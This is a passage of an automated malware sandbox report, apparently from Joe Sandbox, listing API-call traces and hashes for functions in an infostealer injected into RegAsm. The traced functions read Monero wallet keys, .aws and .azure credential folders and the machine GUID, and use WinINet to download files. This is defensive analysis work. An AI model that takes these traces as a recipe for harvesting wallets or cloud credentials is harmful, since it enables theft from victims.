                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy
                                                                                    • String ID: Stable\$ Stable\$firefox
                                                                                    • API String ID: 2120869262-2697854757
                                                                                    • Opcode ID: cbc591070e23e547dad82c25336e79ec262d8277c697555a2c597f71d100fc77
                                                                                    • Instruction ID: 1d26c69091b310833a01da009a7ea8e67b8bedb29d0866ac6f751b535dc35178
                                                                                    • Opcode Fuzzy Hash: cbc591070e23e547dad82c25336e79ec262d8277c697555a2c597f71d100fc77
                                                                                    • Instruction Fuzzy Hash: 70E19171D00249EADF10FBB9D956BDDBFB4AB09304F10817AE80477682DB78570C8BA6
                                                                                    Function 00401C6B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 179stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401C70
                                                                                    • memset.MSVCRT ref: 00401C8E
                                                                                      • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                      • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                      • Part of subcall function 00401000: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                      • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                                    • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    • memset.MSVCRT ref: 00401E9D
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                    • API String ID: 1518627966-218353709
                                                                                    • Opcode ID: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                    • Instruction ID: 901e0a47ee0b89a43ddfaf22904e5be17bd7688e420c1fcef0611cd27edb7556
                                                                                    • Opcode Fuzzy Hash: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                    • Instruction Fuzzy Hash: 06715D71D00248EACB14EBE4D956BDDBBB8AF18308F54407EE505B31C2DE78264CCB69
                                                                                    Function 00404DCA Relevance: 15.1, APIs: 10, Instructions: 116networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00404DCF
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2737972104-0
                                                                                    • Opcode ID: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                                    • Instruction ID: b48a0b941aae4b8094d1842ee2058a608b59a9df84dda5b7ed82bcf6dbc203b8
                                                                                    • Opcode Fuzzy Hash: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                                    • Instruction Fuzzy Hash: D6413CB1800119AFDB20EBA0DC45FEE7BBDFB45304F10447AFA15B2191D7385A498BA5
                                                                                    Function 00410415 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 0041043B
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NeB,?,?,00000000), ref: 00410457
                                                                                    • RegQueryValueExA.KERNEL32(NeB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                    • CharToOemA.USER32(?,?), ref: 00410493
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CharOpenQueryValuememset
                                                                                    • String ID: MachineGuid$NeB$SOFTWARE\Microsoft\Cryptography
                                                                                    • API String ID: 1728412123-1973151993
                                                                                    • Opcode ID: 8a42b9606ce94e91a3aee8c6c2ec702ea9be6fa22a3d7d9db661520a3802ec5d
                                                                                    • Instruction ID: e049fcdf3dccc2042a1c1aa5727c33f1d227b0b17948d6a14ccc4f9ac1de0051
                                                                                    • Opcode Fuzzy Hash: 8a42b9606ce94e91a3aee8c6c2ec702ea9be6fa22a3d7d9db661520a3802ec5d
                                                                                    • Instruction Fuzzy Hash: 8A014F7590421DFFEB10DB90DC89FEAB77CEB18708F5000A5B644E2051EAB45FC88B60
                                                                                    Function 0041695F Relevance: 11.2, APIs: 5, Strings: 1, Instructions: 654networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00416964
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 004134FD: _EH_prolog.MSVCRT ref: 00413502
                                                                                      • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32(74DD0000,00416AAC), ref: 00417659
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417670
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417687
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041769E
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176B5
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176CC
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176E3
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176FA
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417711
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417728
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041773F
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417756
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041776D
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417784
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041779B
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177B2
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177C9
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177E0
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177F7
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041780E
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417825
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041783C
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417853
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041786A
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,5A&6A,?,004265BB,00000000,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064), ref: 00416B55
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0041390C: _EH_prolog.MSVCRT ref: 00413911
                                                                                      • Part of subcall function 0041390C: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                      • Part of subcall function 00413295: _EH_prolog.MSVCRT ref: 0041329A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C3A
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C56
                                                                                      • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                      • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                      • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                      • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                      • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                      • Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
                                                                                      • Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                      • Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                      • Part of subcall function 00411CD8: _EH_prolog.MSVCRT ref: 00411CDD
                                                                                      • Part of subcall function 00411CD8: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                                      • Part of subcall function 00411CD8: ExitProcess.KERNEL32 ref: 00411D0A
                                                                                      • Part of subcall function 0040ED08: _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                      • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                      • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                      • Part of subcall function 0040514C: _EH_prolog.MSVCRT ref: 00405151
                                                                                      • Part of subcall function 0040514C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                      • Part of subcall function 0040514C: StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                      • Part of subcall function 004117C4: _EH_prolog.MSVCRT ref: 004117C9
                                                                                      • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 004117F0
                                                                                      • Part of subcall function 004117C4: StrCmpCA.SHLWAPI(00000000,00426570,?,?,?,?,00416EC0), ref: 00411821
                                                                                      • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 00411882
                                                                                      • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                                      • Part of subcall function 004165D9: _EH_prolog.MSVCRT ref: 004165DE
                                                                                      • Part of subcall function 004165D9: lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                      • Part of subcall function 004165D9: lstrcat.KERNEL32(?), ref: 0041663F
                                                                                      • Part of subcall function 00416791: _EH_prolog.MSVCRT ref: 00416796
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 004167B6
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 00416834
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 004168B7
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$memset$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSystemTimeVolumeWindows
                                                                                    • String ID: 5A&6A
                                                                                    • API String ID: 1955031769-2983527881
                                                                                    • Opcode ID: f56475e3e9353e3f899919c66131b9dca8b7c1d3b1fcd2b89d564be33ac666e9
                                                                                    • Instruction ID: edbb1815c7422c7d311f49e837a4d97797ab122b1f4c92a9abc43992aef21044
                                                                                    • Opcode Fuzzy Hash: f56475e3e9353e3f899919c66131b9dca8b7c1d3b1fcd2b89d564be33ac666e9
                                                                                    • Instruction Fuzzy Hash: 8C4242B1D00358AADF10EBE5C946BDEBB78AF15304F5041AEF54573281DB781B888BA7
                                                                                    Function 0040618B Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00406190
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                    • String ID:
                                                                                    • API String ID: 3869837436-0
                                                                                    • Opcode ID: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                    • Instruction ID: 909566f9f53506b5aa2d8709c9cb46b640c87a2d020782bf56f99dd61eaf9922
                                                                                    • Opcode Fuzzy Hash: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                    • Instruction Fuzzy Hash: 6E218B70A00115ABDB20AFA4DC48EAFBBB9FF95710F20056EF952E62D4D7389911CB64
                                                                                    Function 0040FF81 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 0040FF8F
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                    • wsprintfA.USER32 ref: 0040FFDC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
